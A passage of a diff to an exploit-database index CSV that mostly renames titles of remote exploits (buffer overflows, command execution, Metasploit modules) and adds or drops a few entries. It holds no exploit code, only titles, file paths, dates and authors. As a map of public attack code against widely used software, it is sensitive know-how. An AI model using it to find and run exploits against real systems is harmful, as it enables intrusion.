Virtual Technician MVTControl 6.3.0.1911 - GetObject (Metasploit)",2012-05-01,Metasploit,windows,remote,0 18818,platforms/windows/remote/18818.py,"SolarWinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection",2012-05-01,muts,windows,remote,0 18825,platforms/windows/remote/18825.rb,"VideoLAN VLC Media Player 2.0.0 - Mms Stream Handling Buffer Overflow (Metasploit)",2012-05-03,Metasploit,windows,remote,0 @@ -11870,7 +11880,7 @@ id,file,description,date,author,platform,type,port 19040,platforms/solaris/remote/19040.txt,"SunView (SunOS 4.1.1) - 'selection_svc' Remote File Read",1990-08-14,"Peter Shipley",solaris,remote,0 19044,platforms/solaris/remote/19044.txt,"SunOS 4.1.3 - LD_LIBRARY_PATH / LD_OPTIONS",1992-05-27,anonymous,solaris,remote,0 19047,platforms/aix/remote/19047.txt,"Stalker Internet Mail Server 1.6 - Buffer Overflow",2001-09-12,"David Luyer",aix,remote,0 -19048,platforms/aix/remote/19048.txt,"IRIX 6.4 - 'pfdisplay.cgi'",1998-04-07,"J.A. Gutierrez",aix,remote,0 +19048,platforms/aix/remote/19048.txt,"IRIX 6.4 - 'pfdisplay.cgi' Code Execution",1998-04-07,"J.A. Gutierrez",aix,remote,0 19069,platforms/linux/remote/19069.txt,"Qualcomm Eudora Internet Mail Server 1.2 - Buffer Overflow",1998-04-14,"Netstat Webmaster",linux,remote,0 19079,platforms/linux/remote/19079.c,"id Software Solaris Quake II 3.13/3.14 / QuakeWorld 2.0/2.1 / Quake 1.9/3.13/3.14 - Command Execution",1998-05-01,"Mark Zielinski",linux,remote,0 19081,platforms/multiple/remote/19081.txt,"Lynx 2.8 - Buffer Overflow",1998-05-03,"Michal Zalewski",multiple,remote,0 @@ -11943,7 +11953,7 @@ id,file,description,date,author,platform,type,port 19601,platforms/windows/remote/19601.txt,"etype eserv 2.50 - Directory Traversal",1999-11-04,"Ussr Labs",windows,remote,0 19297,platforms/linux/remote/19297.c,"IBM Scalable POWERparallel (SP) 2.0 - 'sdrd' File Read",1998-08-05,"Chuck Athey & Jim Garlick",linux,remote,0 19298,platforms/multiple/remote/19298.txt,"SGI IRIX 6.2 - cgi-bin wrap",1997-04-19,"J.A. Gutierrez",multiple,remote,0 -19299,platforms/multiple/remote/19299.txt,"SGI IRIX 6.3 - cgi-bin 'webdist.cgi'",1997-05-06,anonymous,multiple,remote,0 +19299,platforms/multiple/remote/19299.txt,"SGI IRIX 6.3 - cgi-bin 'webdist.cgi' Command Execution",1997-05-06,anonymous,multiple,remote,0 19303,platforms/multiple/remote/19303.txt,"SGI IRIX 6.4 - cgi-bin handler",1997-06-16,"Razvan Dragomirescu",multiple,remote,0 19316,platforms/irix/remote/19316.c,"SGI IRIX 6.5.2 - 'nsd' Information Gathering",1999-05-31,"Jefferson Ogata",irix,remote,0 19322,platforms/windows/remote/19322.rb,"Apple iTunes 10.6.1.7 - Extended m3u Stack Buffer Overflow (Metasploit)",2012-06-21,Rh0,windows,remote,0 @@ -11970,14 +11980,14 @@ id,file,description,date,author,platform,type,port 19458,platforms/linux/remote/19458.c,"Linux Kernel 2.0.30/2.0.35/2.0.36/2.0.37 - Blind TCP Spoofing",1999-07-31,Nergal,linux,remote,0 19459,platforms/multiple/remote/19459.txt,"Hybrid Ircd 5.0.3 p7 - Buffer Overflow",1999-08-13,"jduck & stranjer",multiple,remote,0 19466,platforms/multiple/remote/19466.txt,"Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10 - Information Disclosure",1999-08-18,"Gregory Duchemin",multiple,remote,0 -19468,platforms/windows/remote/19468.txt,"Microsoft Internet Explorer 5 - ActiveX 'Object for constructing type libraries for scriptlets'",1999-08-21,"Georgi Guninski",windows,remote,0 +19468,platforms/windows/remote/19468.txt,"Microsoft Internet Explorer 5 - ActiveX Object For Constructing Type Libraries For Scriptlets File Write",1999-08-21,"Georgi Guninski",windows,remote,0 19475,platforms/linux/remote/19475.c,"ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1)",1999-08-17,"babcia padlina ltd",linux,remote,0 19476,platforms/linux/remote/19476.c,"ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2)",1999-08-27,anonymous,linux,remote,0 19478,platforms/unix/remote/19478.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - 'amd' Buffer Overflow (1)",1999-08-31,Taeho,unix,remote,0 19479,platforms/unix/remote/19479.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - 'amd' Buffer Overflow (2)",1999-08-30,c0nd0r,unix,remote,0 19484,platforms/windows/remote/19484.rb,"HP Data Protector - Create New Folder Buffer Overflow (Metasploit)",2012-07-01,Metasploit,windows,remote,3817 19486,platforms/windows/remote/19486.c,"Netscape Communicator 4.06/4.5/4.6/4.51/4.61 - EMBED Buffer Overflow",1999-09-02,"R00t Zer0",windows,remote,0 -19487,platforms/windows/remote/19487.txt,"Microsoft Internet Explorer 4/5 - ActiveX 'Eyedog'",1999-08-21,"Shane Hird's",windows,remote,0 +19487,platforms/windows/remote/19487.txt,"Microsoft Internet Explorer 4/5 - ActiveX 'Eyedog' Remote Overflow",1999-08-21,"Shane Hird's",windows,remote,0 19490,platforms/windows/remote/19490.txt,"Microsoft Internet Explorer 4.0.1/5 - Import/Export Favorites",1999-09-10,"Georgi Guninski",windows,remote,0 19491,platforms/windows/remote/19491.txt,"BindView HackerShield 1.0/1.1 - HackerShield AgentAdmin Password",1999-09-10,anonymous,windows,remote,0 19492,platforms/multiple/remote/19492.txt,"Microsoft Internet Explorer 5 / Netscape Communicator 4.0/4.5/4.6 - JavaScript STYLE",1999-09-13,"Georgi Guninski",multiple,remote,0 @@ -12037,7 +12047,7 @@ id,file,description,date,author,platform,type,port 19621,platforms/windows/remote/19621.c,"Admiral Systems EmailClub 1.0.0.5 - Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 19622,platforms/windows/remote/19622.c,"Antelope Software W4-Server 2.6 a/Win32 - 'Cgitest.exe' Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 19623,platforms/windows/remote/19623.c,"International TeleCommunications WebBBS 2.13 - login & Password Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 -19625,platforms/windows/remote/19625.py,"ALLMediaServer 0.8 - Overflow (SEH)",2012-07-06,"motaz reda",windows,remote,888 +19625,platforms/windows/remote/19625.py,"ALLMediaServer 0.8 - Remote Overflow (SEH)",2012-07-06,"motaz reda",windows,remote,888 19632,platforms/hardware/remote/19632.txt,"Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink WebServer - Retrieve Administrator Password",1999-11-17,"Dennis W. Mattison",hardware,remote,0 19634,platforms/linux/remote/19634.c,"ETL Delegate 5.9.x/6.0.x - Buffer Overflow",1999-11-13,scut,linux,remote,0 19637,platforms/windows/remote/19637.txt,"Microsoft Internet Explorer 5 (Windows 95/98/2000/NT 4.0) - XML HTTP Redirect",1999-11-22,"Georgi Guninksi",windows,remote,0 @@ -12272,7 +12282,7 @@ id,file,description,date,author,platform,type,port 20231,platforms/hardware/remote/20231.txt,"Cisco PIX Firewall 4.x/5.x - SMTP Content Filtering Evasion",2000-09-19,"Lincoln Yeoh",hardware,remote,0 20234,platforms/multiple/remote/20234.txt,"extent technologies rbs isp 2.5 - Directory Traversal",2000-09-21,anon,multiple,remote,8002 20235,platforms/windows/remote/20235.pl,"Cisco Secure ACS for Windows NT 2.42 - Buffer Overflow",2000-09-21,blackangels,windows,remote,0 -20236,platforms/linux/remote/20236.txt,"S.u.S.E. Linux 6.3/6.4 - Installed Package Disclosure",2000-09-21,t0maszek,linux,remote,0 +20236,platforms/linux/remote/20236.txt,"SuSE Linux 6.3/6.4 - Installed Package Disclosure",2000-09-21,t0maszek,linux,remote,0 20237,platforms/linux/remote/20237.c,"UoW Pine 4.0.4/4.10/4.21 - 'From:' Buffer Overflow",2000-09-23,Arkane,linux,remote,0 20238,platforms/cgi/remote/20238.txt,"Alabanza Control Panel 3.0 - Domain Modification",2000-09-24,"Weihan Leow",cgi,remote,0 20240,platforms/windows/remote/20240.txt,"Microsoft Windows Media Player 7 - Embedded OCX Control",2000-09-26,"Ussr Labs",windows,remote,0 @@ -12366,7 +12376,7 @@ id,file,description,date,author,platform,type,port 20448,platforms/cgi/remote/20448.txt,"Novell NetWare Web Server 2.x - convert.bas",1996-07-03,"TTT Group",cgi,remote,0 20449,platforms/unix/remote/20449.txt,"GlimpseHTTP 1.0/2.0 / WebGlimpse 1.0 - Piped Command",1996-07-03,"Razvan Dragomirescu",unix,remote,0 20450,platforms/multiple/remote/20450.txt,"Trlinux Postaci Webmail 1.1.3 - Password Disclosure",2000-11-30,"Michael R. Rudel",multiple,remote,0 -20459,platforms/windows/remote/20459.html,"Microsoft Internet Explorer 5 - 'INPUT TYPE=FILE'",2000-12-01,Key,windows,remote,0 +20459,platforms/windows/remote/20459.html,"Microsoft Internet Explorer 5 - 'INPUT TYPE=FILE' Remote File Upload",2000-12-01,Key,windows,remote,0 20460,platforms/windows/remote/20460.txt,"Microsoft Windows NT 4.0 - Phonebook Server Buffer Overflow",2000-12-04,"Alberto Solino",windows,remote,0 20461,platforms/windows/remote/20461.txt,"Cat Soft Serv-U FTP Server 2.4/2.5 - FTP Directory Traversal",2000-12-05,Zoa_Chien,windows,remote,0 20462,platforms/unix/remote/20462.txt,"Hylafax 4.0 pl2 Faxsurvey - Remote Command Execution",1998-08-04,Tom,unix,remote,0 @@ -13460,6 +13470,7 @@ id,file,description,date,author,platform,type,port 23735,platforms/hardware/remote/23735.py,"Ubiquiti AirOS 5.5.2 - Authenticated Remote Command Execution",2012-12-29,xistence,hardware,remote,0 23736,platforms/windows/remote/23736.rb,"IBM Lotus iNotes dwa85W - ActiveX Buffer Overflow (Metasploit)",2012-12-31,Metasploit,windows,remote,0 23737,platforms/windows/remote/23737.rb,"IBM Lotus QuickR qp2 - ActiveX Buffer Overflow (Metasploit)",2012-12-31,Metasploit,windows,remote,0 +23740,platforms/linux/remote/23740.c,"Samhain Labs 1.x - HSFTP Remote Format String",2004-02-23,priest@priestmaster.org,linux,remote,0 23741,platforms/windows/remote/23741.c,"Proxy-Pro Professional GateKeeper 4.7 Web Proxy - Buffer Overrun",2004-02-23,kralor,windows,remote,0 23751,platforms/windows/remote/23751.txt,"Apache Cygwin 1.3.x/2.0.x - Directory Traversal",2004-02-24,"Jeremy Bae",windows,remote,0 23754,platforms/windows/remote/23754.rb,"Microsoft Internet Explorer - CDwnBindInfo Object Use-After-Free (Metasploit)",2012-12-31,Metasploit,windows,remote,0 @@ -13470,7 +13481,7 @@ id,file,description,date,author,platform,type,port 23766,platforms/windows/remote/23766.html,"Microsoft Internet Explorer 5/6 - Cross-Domain Event Leakage",2004-02-27,iDefense,windows,remote,0 23768,platforms/windows/remote/23768.txt,"Microsoft Internet Explorer 6 - window.open Media Bar Cross-Zone Scripting",2003-09-11,Jelmer,windows,remote,0 23771,platforms/linux/remote/23771.pl,"GNU Anubis 3.6.x/3.9.x - Multiple Format String Vulnerabilities",2004-03-01,"Ulf Harnhammar",linux,remote,0 -23772,platforms/linux/remote/23772.c,"GNU Anubis 3.6.x/3.9.x - 'auth.c auth_ident()' Overflow",2004-03-01,CMN,linux,remote,0 +23772,platforms/linux/remote/23772.c,"GNU Anubis 3.6.x/3.9.x - 'auth.c auth_ident()' Remote Overflow",2004-03-01,CMN,linux,remote,0 23776,platforms/windows/remote/23776.txt,"Software602 602Pro LAN Suite - Web Mail Cross-Site Scripting",2004-03-01,"Rafel Ivgi The-Insider",windows,remote,0 23777,platforms/linux/remote/23777.txt,"Squid Proxy 2.4/2.5 - NULL URL Character Unauthorized Access",2004-03-01,"Mitch Adair",linux,remote,0 23785,platforms/windows/remote/23785.rb,"Microsoft Internet Explorer - CButton Object Use-After-Free (Metasploit)",2013-01-02,Metasploit,windows,remote,0 @@ -13497,7 +13508,7 @@ id,file,description,date,author,platform,type,port 23880,platforms/windows/remote/23880.txt,"HP Web Jetadmin 7.5.2456 - Arbitrary Command Execution",2004-03-24,wirepair,windows,remote,0 23881,platforms/linux/remote/23881.txt,"Emil 2.x - Multiple Buffer Overrun / Format String Vulnerabilities",2004-03-25,"Ulf Harnhammar",linux,remote,0 23887,platforms/windows/remote/23887.rb,"Enterasys NetSight - 'nssyslogd.exe' Buffer Overflow (Metasploit)",2013-01-04,Metasploit,windows,remote,0 -23969,platforms/windows/remote/23969.rb,"IBM Cognos - 'tm1admsd.exe' Overflow (Metasploit)",2013-01-08,Metasploit,windows,remote,0 +23969,platforms/windows/remote/23969.rb,"IBM Cognos - 'tm1admsd.exe' Remote Overflow (Metasploit)",2013-01-08,Metasploit,windows,remote,0 23893,platforms/multiple/remote/23893.txt,"WebCT Campus Edition 3.8/4.x - HTML Injection",2004-03-29,"Simon Boulet",multiple,remote,0 23903,platforms/windows/remote/23903.html,"Microsoft Internet Explorer 6 - HTML Form Status Bar Misrepresentation",2004-03-31,http-equiv,windows,remote,0 23905,platforms/windows/remote/23905.txt,"ADA IMGSVR 0.4 - Remote Directory Listing",2004-04-01,"Donato Ferrante & Dr_insane",windows,remote,0 @@ -13704,7 +13715,7 @@ id,file,description,date,author,platform,type,port 24874,platforms/multiple/remote/24874.rb,"Apache Struts - 'ParametersInterceptor' Remote Code Execution (Metasploit)",2013-03-22,Metasploit,multiple,remote,0 24875,platforms/windows/remote/24875.rb,"Sami FTP Server - LIST Command Buffer Overflow (Metasploit)",2013-03-22,Metasploit,windows,remote,0 24876,platforms/windows/remote/24876.rb,"Cool PDF Image Stream - Buffer Overflow (Metasploit)",2013-03-22,Metasploit,windows,remote,0 -24886,platforms/windows/remote/24886.html,"Mitsubishi MX ActiveX Component 3 - 'ActUWzd.dll' 'WzTitle' Remote",2013-03-25,Dr_IDE,windows,remote,0 +24886,platforms/windows/remote/24886.html,"Mitsubishi MX ActiveX Component 3 - 'ActUWzd.dll' 'WzTitle' Remote Heap Spray",2013-03-25,Dr_IDE,windows,remote,0 24887,platforms/windows/remote/24887.rb,"KingView - Log File Parsing Buffer Overflow (Metasploit)",2013-03-25,Metasploit,windows,remote,0 24888,platforms/linux/remote/24888.rb,"Mutiny - Remote Command Execution (Metasploit)",2013-03-25,Metasploit,linux,remote,0 24891,platforms/windows/remote/24891.rb,"HP Intelligent Management Center - Arbitrary File Upload (Metasploit)",2013-03-26,Metasploit,windows,remote,0 @@ -13910,7 +13921,7 @@ id,file,description,date,author,platform,type,port 25975,platforms/linux/remote/25975.rb,"MiniUPnPd 1.0 - Stack Buffer Overflow Remote Code Execution (Metasploit)",2013-06-05,Metasploit,linux,remote,5555 25979,platforms/windows/remote/25979.rb,"Oracle WebCenter Content - 'CheckOutAndOpen.dll' ActiveX Remote Code Execution (Metasploit)",2013-06-05,Metasploit,windows,remote,0 25980,platforms/multiple/remote/25980.rb,"Apache Struts - includeParams Remote Code Execution (Metasploit)",2013-06-05,Metasploit,multiple,remote,8080 -25986,platforms/php/remote/25986.txt,"Plesk < 9.5.4 - Remote",2013-06-05,kingcope,php,remote,0 +25986,platforms/php/remote/25986.txt,"Plesk < 9.5.4 - Remote Command Execution",2013-06-05,kingcope,php,remote,0 25987,platforms/hardware/remote/25987.txt,"Xpient - Cash Drawer Operation",2013-06-05,"Core Security",hardware,remote,0 25988,platforms/multiple/remote/25988.txt,"Oracle9i Application Server 9.0.2 - MOD_ORADAV Access Control",2003-02-13,"David Litchfield",multiple,remote,0 25989,platforms/windows/remote/25989.txt,"NullSoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow",2005-07-15,"Leon Juranic",windows,remote,0 @@ -14107,7 +14118,7 @@ id,file,description,date,author,platform,type,port 28209,platforms/multiple/remote/28209.txt,"FLV Players 8 - 'player.php?url' Cross-Site Scripting",2006-07-12,xzerox,multiple,remote,0 28210,platforms/multiple/remote/28210.txt,"FLV Players 8 - 'popup.php?url' Cross-Site Scripting",2006-07-12,xzerox,multiple,remote,0 28224,platforms/windows/remote/28224.c,"Microsoft PowerPoint 2003 - 'mso.dll' '.PPT' Processing Code Execution",2006-07-14,"naveed afzal",windows,remote,0 -28225,platforms/windows/remote/28225.c,"Microsoft PowerPoint 2003 - 'powerpnt.exe'",2006-07-14,"naveed afzal",windows,remote,0 +28225,platforms/windows/remote/28225.c,"Microsoft PowerPoint 2003 - 'powerpnt.exe' Remote Overflow",2006-07-14,"naveed afzal",windows,remote,0 28226,platforms/windows/remote/28226.c,"Microsoft PowerPoint 2003 - '.ppt' File Closure Memory Corruption",2006-07-14,"naveed afzal",windows,remote,0 28235,platforms/windows/remote/28235.c,"RARLAB WinRAR 3.x - LHA Filename Handling Buffer Overflow",2006-07-18,"Ryan Smith",windows,remote,0 28245,platforms/hardware/remote/28245.pl,"Cisco Security Monitoring Analysis and Response System JBoss - Command Execution",2006-07-19,"Jon Hart",hardware,remote,0 @@ -14163,7 +14174,7 @@ id,file,description,date,author,platform,type,port 28760,platforms/php/remote/28760.php,"PHP 3 < 5 - ZendEngine ECalloc Integer Overflow",2006-10-05,anonymous,php,remote,0 28765,platforms/windows/remote/28765.c,"Computer Associates Products Message Engine RPC Server - Multiple Buffer Overflow Vulnerabilities (1)",2006-10-05,LSsec.com,windows,remote,0 28766,platforms/windows/remote/28766.py,"Computer Associates Products Message Engine RPC Server - Multiple Buffer Overflow Vulnerabilities (2)",2006-10-05,LSsec.com,windows,remote,0 -28809,platforms/windows/remote/28809.rb,"HP LoadRunner - 'magentproc.exe' Overflow (Metasploit)",2013-10-08,Metasploit,windows,remote,443 +28809,platforms/windows/remote/28809.rb,"HP LoadRunner - 'magentproc.exe' Remote Overflow (Metasploit)",2013-10-08,Metasploit,windows,remote,443 28810,platforms/unix/remote/28810.rb,"GestioIP - Remote Command Execution (Metasploit)",2013-10-08,Metasploit,unix,remote,0 28835,platforms/novell/remote/28835.pl,"Novell eDirectory 8.x - iMonitor HTTPSTK Buffer Overflow (1)",2006-10-21,"Manuel Santamarina Suarez",novell,remote,0 28836,platforms/novell/remote/28836.c,"Novell eDirectory 8.x - iMonitor HTTPSTK Buffer Overflow (2)",2006-10-30,Expanders,novell,remote,0 @@ -14330,7 +14341,6 @@ id,file,description,date,author,platform,type,port 30279,platforms/multiple/remote/30279.txt,"SAP Internet Graphics Server 7.0 - 'ADM:GETLOGFILE?PARAMS' Cross-Site Scripting",2007-07-05,"Mark Litchfield",multiple,remote,0 30281,platforms/windows/remote/30281.txt,"Microsoft .Net Framework 2.0 - Multiple Null Byte Injection Vulnerabilities",2007-07-06,"Paul Craig",windows,remote,0 30285,platforms/linux/remote/30285.txt,"Microsoft Internet Explorer and Mozilla Firefox - URI Handler Command Injection",2007-07-10,"Thor Larholm",linux,remote,0 -30286,platforms/linux/remote/30286.txt,"ImgSvr 0.6 - 'Template' Local File Inclusion",2007-07-10,"Tim Brown",linux,remote,0 30287,platforms/windows/remote/30287.txt,"TippingPoint IPS - Unicode Character Detection Bypass",2007-07-10,Security-Assessment.com,windows,remote,0 30288,platforms/multiple/remote/30288.txt,"Adobe Flash Player 8.0.24 - '.SWF' File Handling Remote Code Execution",2007-07-10,"Stefano DiPaola",multiple,remote,0 30291,platforms/linux/remote/30291.txt,"ClamAV / UnRAR - .RAR Handling Remote Null Pointer Dereference",2007-07-11,"Metaeye Security Group",linux,remote,0 @@ -14386,7 +14396,7 @@ id,file,description,date,author,platform,type,port 32391,platforms/hardware/remote/32391.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (2)",2008-09-17,"Jeremy Brown",hardware,remote,0 33141,platforms/php/remote/33141.rb,"Alienvault Open Source SIEM (OSSIM) - SQL Injection / Remote Code Execution (Metasploit)",2014-05-02,Metasploit,php,remote,443 32390,platforms/hardware/remote/32390.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (1)",2008-09-17,"Jeremy Brown",hardware,remote,0 -32277,platforms/lin_x86-64/remote/32277.txt,"Nginx 1.4.0 (Generic Linux x64) - Remote",2014-03-15,sorbo,lin_x86-64,remote,0 +32277,platforms/lin_x86-64/remote/32277.txt,"Nginx 1.4.0 (Generic Linux x64) - Remote Overflow",2014-03-15,sorbo,lin_x86-64,remote,0 30582,platforms/windows/remote/30582.html,"WinSCP 4.0.3 - URL Protocol Handler Arbitrary File Access",2007-09-13,Kender.Security,windows,remote,0 30589,platforms/windows/remote/30589.txt,"WinImage 8.0/8.10 - File Handling Traversal Arbitrary File Overwrite",2007-09-17,j00ru//vx,windows,remote,0 30600,platforms/windows/remote/30600.html,"Xunlei Web Thunder 5.6.9.344 - ActiveX Control DownURL2 Method Remote Buffer Overflow",2007-09-20,7jdg,windows,remote,0 @@ -14469,7 +14479,7 @@ id,file,description,date,author,platform,type,port 31133,platforms/hardware/remote/31133.txt,"F5 BIG-IP 9.4.3 - Web Management Interface Cross-Site Request Forgery",2008-02-11,nnposter,hardware,remote,0 31149,platforms/windows/remote/31149.txt,"Sentinel Protection Server 7.x/Keys Server 1.0.x - Backslash Directory Traversal",2008-02-11,"Luigi Auriemma",windows,remote,0 31163,platforms/windows/remote/31163.txt,"WinIPDS 3.3 rev. G52-33-021 - Directory Traversal / Denial of Service",2008-02-12,"Luigi Auriemma",windows,remote,0 -40760,platforms/windows/remote/40760.rb,"Easy Internet Sharing Proxy Server 2.2 - Overflow (SEH) (Metasploit)",2016-11-15,"Tracy Turben",windows,remote,0 +40760,platforms/windows/remote/40760.rb,"Easy Internet Sharing Proxy Server 2.2 - Remote Overflow (SEH) (Metasploit)",2016-11-15,"Tracy Turben",windows,remote,0 31683,platforms/hardware/remote/31683.php,"Linksys E-series - Unauthenticated Remote Code Execution",2014-02-16,Rew,hardware,remote,0 31179,platforms/windows/remote/31179.html,"Daum Game 1.1.0.5 - ActiveX 'IconCreate Method' Stack Buffer Overflow",2014-01-24,"Trustwave's SpiderLabs",windows,remote,0 31181,platforms/windows/remote/31181.rb,"HP Data Protector - Backup Client Service Directory Traversal (Metasploit)",2014-01-24,Metasploit,windows,remote,5555 @@ -14760,7 +14770,7 @@ id,file,description,date,author,platform,type,port 33079,platforms/multiple/remote/33079.txt,"Oracle WebLogic Server 10.3 - 'console-help.portal' Cross-Site Scripting",2009-06-14,"Alexandr Polyakov",multiple,remote,0 33081,platforms/multiple/remote/33081.cpp,"Oracle 9i/10g Database - Remote Network Authentication",2009-06-14,"Dennis Yurichev",multiple,remote,0 33082,platforms/multiple/remote/33082.txt,"Oracle 10g Secure Enterprise Search - 'search_p_groups' Cross-Site Scripting",2009-06-14,"Alexandr Polyakov",multiple,remote,0 -33084,platforms/multiple/remote/33084.txt,"Oracle 9i/10g Database - Network Foundation Remote",2009-06-14,"Dennis Yurichev",multiple,remote,0 +33084,platforms/multiple/remote/33084.txt,"Oracle 9i/10g Database - Network Foundation Remote Overflow",2009-06-14,"Dennis Yurichev",multiple,remote,0 33089,platforms/windows/remote/33089.pl,"iDefense COMRaider - ActiveX Control Multiple Insecure Method Vulnerabilities",2009-06-17,"Khashayar Fereidani",windows,remote,0 33351,platforms/novell/remote/33351.pl,"Novell eDirectory 8.8 - '/dhost/modules?I:' Buffer Overflow",2009-11-12,HACKATTACK,novell,remote,0 33580,platforms/hardware/remote/33580.txt,"COMTREND CT-507 IT ADSL Router - 'scvrtsrv.cmd' Cross-Site Scripting",2010-01-29,Yoyahack,hardware,remote,0 @@ -14823,7 +14833,7 @@ id,file,description,date,author,platform,type,port 33499,platforms/multiple/remote/33499.txt,"thttpd 2.24 - HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33500,platforms/multiple/remote/33500.txt,"mini_httpd 1.18 - HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33501,platforms/windows/remote/33501.txt,"Cherokee 0.99.30 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,windows,remote,0 -33502,platforms/windows/remote/33502.txt,"Yaws 1.55 - 'Terminal Escape Sequence in Logs' Command Injection",2010-01-11,evilaliv3,windows,remote,0 +33502,platforms/windows/remote/33502.txt,"Yaws 1.55 - 'Logs' Terminal Escape Sequence Command Injection",2010-01-11,evilaliv3,windows,remote,0 33503,platforms/multiple/remote/33503.txt,"Orion Application Server 2.0.7 - 'Terminal Escape Sequence in Logs' Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33504,platforms/multiple/remote/33504.txt,"BOA Web Server 0.94.x - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33521,platforms/multiple/remote/33521.rb,"Symantec Workspace Streaming - Arbitrary File Upload (Metasploit)",2014-05-26,Metasploit,multiple,remote,9855 @@ -14940,7 +14950,6 @@ id,file,description,date,author,platform,type,port 34064,platforms/hardware/remote/34064.rb,"D-Link HNAP - Request Remote Buffer Overflow (Metasploit)",2014-07-14,Metasploit,hardware,remote,80 34065,platforms/hardware/remote/34065.rb,"D-Link Devices - Unauthenticated UPnP M-SEARCH Multicast Command Injection (Metasploit)",2014-07-14,Metasploit,hardware,remote,1900 34066,platforms/windows/remote/34066.py,"HP Data Protector Manager 8.10 - Remote Command Execution",2014-07-14,Polunchis,windows,remote,0 -34136,platforms/multiple/remote/34136.txt,"Plesk Server Administrator (PSA) - 'locale' Local File Inclusion",2010-06-21,"Pouya Daneshmand",multiple,remote,0 34088,platforms/android/remote/34088.html,"Boat Browser 8.0/8.0.1 - Remote Code Execution",2014-07-16,c0otlass,android,remote,0 34156,platforms/windows/remote/34156.pl,"TurboFTP Server 1.20.745 - Directory Traversal",2010-06-17,leinakesi,windows,remote,0 34115,platforms/windows/remote/34115.txt,"McAfee Unified Threat Management Firewall 4.0.6 - 'page' Cross-Site Scripting",2010-06-07,"Adam Baldwin",windows,remote,0 @@ -15218,7 +15227,7 @@ id,file,description,date,author,platform,type,port 35924,platforms/windows/remote/35924.py,"ClearSCADA - Remote Authentication Bypass",2015-01-28,"Jeremy Brown",windows,remote,0 35925,platforms/hardware/remote/35925.txt,"Portech MV-372 VoIP Gateway - Multiple Vulnerabilities",2011-07-05,"Zsolt Imre",hardware,remote,0 35928,platforms/windows/remote/35928.html,"Pro Softnet IDrive Online Backup 3.4.0 - ActiveX 'SaveToFile()' Arbitrary File Overwrite",2011-07-06,"High-Tech Bridge SA",windows,remote,0 -35932,platforms/hardware/remote/35932.c,"VSAT Sailor 900 - Remote",2015-01-29,"Nicholas Lemonias",hardware,remote,0 +35932,platforms/hardware/remote/35932.c,"VSAT Sailor 900 - Remote Overflow",2015-01-29,"Nicholas Lemonias",hardware,remote,0 35948,platforms/windows/remote/35948.html,"X360 VideoPlayer ActiveX Control 2.6 - ASLR + DEP Bypass",2015-01-30,Rh0,windows,remote,0 35949,platforms/windows/remote/35949.txt,"Symantec Encryption Management Server < 3.2.0 MP6 - Remote Command Injection",2015-01-30,"Paul Craig",windows,remote,0 35961,platforms/hp-ux/remote/35961.py,"HP Data Protector 8.x - Remote Command Execution",2015-01-30,"Juttikhun Khamchaiyaphum",hp-ux,remote,0 @@ -15678,7 +15687,7 @@ id,file,description,date,author,platform,type,port 40170,platforms/python/remote/40170.rb,"Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)",2016-07-27,Metasploit,python,remote,80 40176,platforms/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Command Execution (Metasploit) (3)",2016-07-29,xort,linux,remote,8000 40177,platforms/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Command Execution (Metasploit)",2016-07-29,xort,linux,remote,8000 -40178,platforms/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - Overflow (Egghunter) (SEH)",2016-07-29,ch3rn0byl,windows,remote,80 +40178,platforms/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - Remote Overflow (Egghunter) (SEH)",2016-07-29,ch3rn0byl,windows,remote,80 40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices / NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0 40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 < 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0 40232,platforms/linux/remote/40232.py,"FreePBX 13/14 - Remote Command Execution / Privilege Escalation",2016-08-12,pgt,linux,remote,0 @@ -15687,7 +15696,7 @@ id,file,description,date,author,platform,type,port 40279,platforms/windows/remote/40279.py,"Microsoft Windows - 'NetAPI32.dll' Code Execution (Python) (MS08-067)",2016-02-26,ohnozzy,windows,remote,0 40235,platforms/hardware/remote/40235.py,"Samsung Smart Home Camera SNH-P-6410 - Command Injection",2016-08-14,PentestPartners,hardware,remote,0 40258,platforms/hardware/remote/40258.txt,"Cisco ASA 8.x - 'EXTRABACON' Authentication Bypass",2016-08-18,"Shadow Brokers",hardware,remote,161 -40275,platforms/hardware/remote/40275.txt,"TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote",2016-08-19,"Shadow Brokers",hardware,remote,0 +40275,platforms/hardware/remote/40275.txt,"TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote Command Execution",2016-08-19,"Shadow Brokers",hardware,remote,0 40294,platforms/php/remote/40294.rb,"Phoenix Exploit Kit - Remote Code Execution (Metasploit)",2016-08-23,Metasploit,php,remote,80 40436,platforms/android/remote/40436.rb,"Google Android 5.0 < 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0 